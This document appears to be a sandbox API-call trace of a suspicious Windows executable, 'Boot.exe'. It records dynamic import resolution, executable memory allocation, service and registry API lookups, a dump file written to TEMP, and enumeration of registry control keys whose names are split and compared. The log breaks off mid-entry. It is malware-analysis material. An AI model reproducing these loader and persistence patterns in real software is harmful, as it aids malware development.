GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0181.367] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualAlloc") returned 0x76c1e365 [0181.367] VirtualAlloc (lpAddress=0x0, dwSize=0xe200, flAllocationType=0x3000, flProtect=0x40) returned 0x2f0000 [0181.368] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 1 [0181.370] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77c40000 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateFile") returned 0x77c600a4 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapViewOfSection") returned 0x77c5fc40 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="NtFsControlFile") returned 0x77c5fde8 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="RtlImageNtHeader") returned 0x77c73164 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="_chkstk") returned 0x77c7ad68 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="RtlNtStatusToDosError") returned 0x77c761ed [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="memcmp") returned 0x77c72265 [0181.371] GetProcAddress (hModule=0x77c40000, lpProcName="NtUnmapViewOfSection") returned 0x77c5fc70 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteFile") returned 0x77c609d4 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="_snprintf") returned 0x77d14760 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="_snwprintf") returned 0x77c72417 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenSection") returned 0x77c5fdb8 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldiv") returned 0x77c9b140 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldvrm") returned 0x77c6f880 [0181.372] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0181.372] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0181.372] GetProcAddress (hModule=0x772f0000, lpProcName="PathCombineW") returned 0x7730c39c [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="StrToIntExW") returned 0x77320196 [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="StrTrimW") returned 0x773031bc [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrW") returned 0x77303ef0 [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrW") returned 0x772fe52d [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="StrCmpNW") returned 0x77305cc4 [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0181.373] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrW") returned 0x77304640 [0181.373] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0181.373] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0181.373] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0181.373] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0181.373] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0181.374] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0181.375] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0181.375] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0181.375] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0181.375] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0181.375] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0181.407] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0181.407] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0181.408] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0181.409] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0181.410] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0181.411] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0181.411] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x7771a97d [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthority") returned 0x77720e24 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthorityCount") returned 0x77720e0c [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceCtrlDispatcherW") returned 0x7771a965 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0181.411] GetProcAddress (hModule=0x77710000, lpProcName="SetServiceStatus") returned 0x7771c7a6 [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceW") returned 0x77717974 [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceW") returned 0x7773712c [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatusEx") returned 0x7771798c [0181.412] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyW") returned 0x7772445b [0181.412] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0181.412] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0181.412] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0181.415] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0181.415] VirtualProtect (in: lpAddress=0x401000, dwSize=0x7967, flNewProtect=0x2d0160, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0181.436] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe76, flNewProtect=0x2d0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0181.436] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x2d0148, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0181.437] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x2d0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0181.437] VirtualProtect (in: lpAddress=0x410000, dwSize=0x944, flNewProtect=0x2d0140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0181.438] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0181.438] GetProcessHeap () returned 0x6b0000 [0181.438] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x46c4) returned 0x6c4f78 [0181.462] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xa4a6c2e0, dwHighDateTime=0x1d64a6c)) [0181.462] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0181.462] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=30175263061) returned 1 [0181.463] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c [0181.463] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0181.463] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x208) returned 0x6c9648 [0181.463] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x6c9648, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\Boot.exe" (normalized: "c:\\windows\\syswow64\\boot.exe")) returned 0x1c [0181.463] StrRChrW (lpStart="C:\\Windows\\SysWOW64\\Boot.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Boot.exe" [0181.463] lstrlenW (lpString="Boot.exe") returned 8 [0181.463] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6c48d8 [0181.464] PathFindExtensionW (pszPath="Boot.exe") returned=".exe" [0181.464] StrChrW (lpStart="Boot", wMatch=0x3a) returned 0x0 [0181.464] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0181.498] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0181.498] lstrlenW (lpString="Boot") returned 4 [0181.498] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0181.499] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x34) returned 0x6c9858 [0181.499] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x6c9858, nSize=0x11 | out: lpDst="C:\\Windows\\TEMP\\") returned 0x11 [0181.499] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\", lpString2="Boot" | out: lpString1="C:\\Windows\\TEMP\\Boot") returned="C:\\Windows\\TEMP\\Boot" [0181.499] lstrcatW (in: lpString1="C:\\Windows\\TEMP\\Boot", lpString2=".dmp" | out: lpString1="C:\\Windows\\TEMP\\Boot.dmp") returned="C:\\Windows\\TEMP\\Boot.dmp" [0181.499] CreateFileW (lpFileName="C:\\Windows\\TEMP\\Boot.dmp" (normalized: "c:\\windows\\temp\\boot.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0181.529] SetFilePointer (in: hFile=0xa0, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0181.529] SetEndOfFile (hFile=0xa0) returned 1 [0181.529] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x401af6) returned 0x0 [0181.529] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0xa4) returned 0x0 [0181.530] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0181.530] lstrlenW (lpString="ACPI") returned 4 [0181.530] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6caf60 [0181.530] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0181.530] lstrlenW (lpString="AGP") returned 3 [0181.530] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6caf80 [0181.531] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0181.531] lstrlenW (lpString="AppID") returned 5 [0181.531] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cafa0 [0181.531] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0181.566] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6c9a18 [0181.566] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0181.566] lstrlenW (lpString="Arbiters") returned 8 [0181.566] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c3ff8 [0181.566] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0181.566] lstrlenW (lpString="BackupRestore") returned 13 [0181.566] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c4020 [0181.566] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6c4048 [0181.566] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0181.566] lstrlenW (lpString="Class") returned 5 [0181.566] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6c9a38 [0181.566] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0181.566] lstrlenW (lpString="CMF") returned 3 [0181.566] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6c9a58 [0181.567] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0181.567] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0181.567] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0181.567] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0181.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6c9a78 [0181.567] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0181.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c4070 [0181.567] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0181.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x22) returned 0x6c9a98 [0181.567] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0181.567] lstrlenW (lpString="COM Name Arbiter") returned 16 [0181.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6c9ac8 [0181.567] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0181.567] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0181.567] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0181.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cafd8 [0181.567] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0181.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6c4098 [0181.568] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0181.568] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0181.568] lstrlenW (lpString="ComputerName") returned 12 [0181.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c40c0 [0181.568] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0181.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6caff8 [0181.568] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0181.568] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0181.568] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6caff8 | out: hHeap=0x6b0000) returned 1 [0181.568] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0181.568] lstrlenW (lpString="ContentIndex") returned 12 [0181.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6c40e8 [0181.568] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0181.568] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0181.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6caff8 [0181.568] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0181.569] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0181.569] lstrlenW (lpString="CrashControl") returned 12 [0181.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb018 [0181.569] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0181.569] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0181.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6c4110 [0181.569] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0181.569] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0181.569] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0181.569] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0181.569] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0181.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c4138 [0181.569] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0181.569] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0181.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c4160 [0181.569] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0181.570] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0181.570] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4160 | out: hHeap=0x6b0000) returned 1 [0181.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c4160 [0181.570] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0181.570] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0181.570] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0181.570] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0181.570] lstrlenW (lpString="Cryptography") returned 12 [0181.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26) returned 0x6c9ae8 [0181.570] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0181.570] lstrlenW (lpString="DeviceClasses") returned 13 [0181.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c4188 [0181.570] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0181.570] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0181.570] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4188 | out: hHeap=0x6b0000) returned 1 [0181.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6c4188 [0181.570] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0181.570] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0181.570] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0181.571] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0181.571] RegEnumKeyW (in: hKey=0xa4, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0181.571] lstrlenW (lpString="DeviceOverrides") returned 15 [0181.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c41b0 [0181.571] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0181.571] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0181.571] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c41b0 | out: hHeap=0x6b0000) returned 1 [0181.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6c41b0 [0181.571] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0181.571] lstrlenW (lpString="Diagnostics") returned 11 [0181.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cb7c0 [0181.571] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0181.571] lstrlenW (lpString="Els") returned 3 [0181.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb038 [0181.571] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0181.571] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0181.571] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0181.572] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0181.572] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0181.572] lstrlenW (lpString="Errata") returned 6 [0181.572] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c41d8 [0181.572] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0181.572] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0181.572] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0181.572] lstrlenW 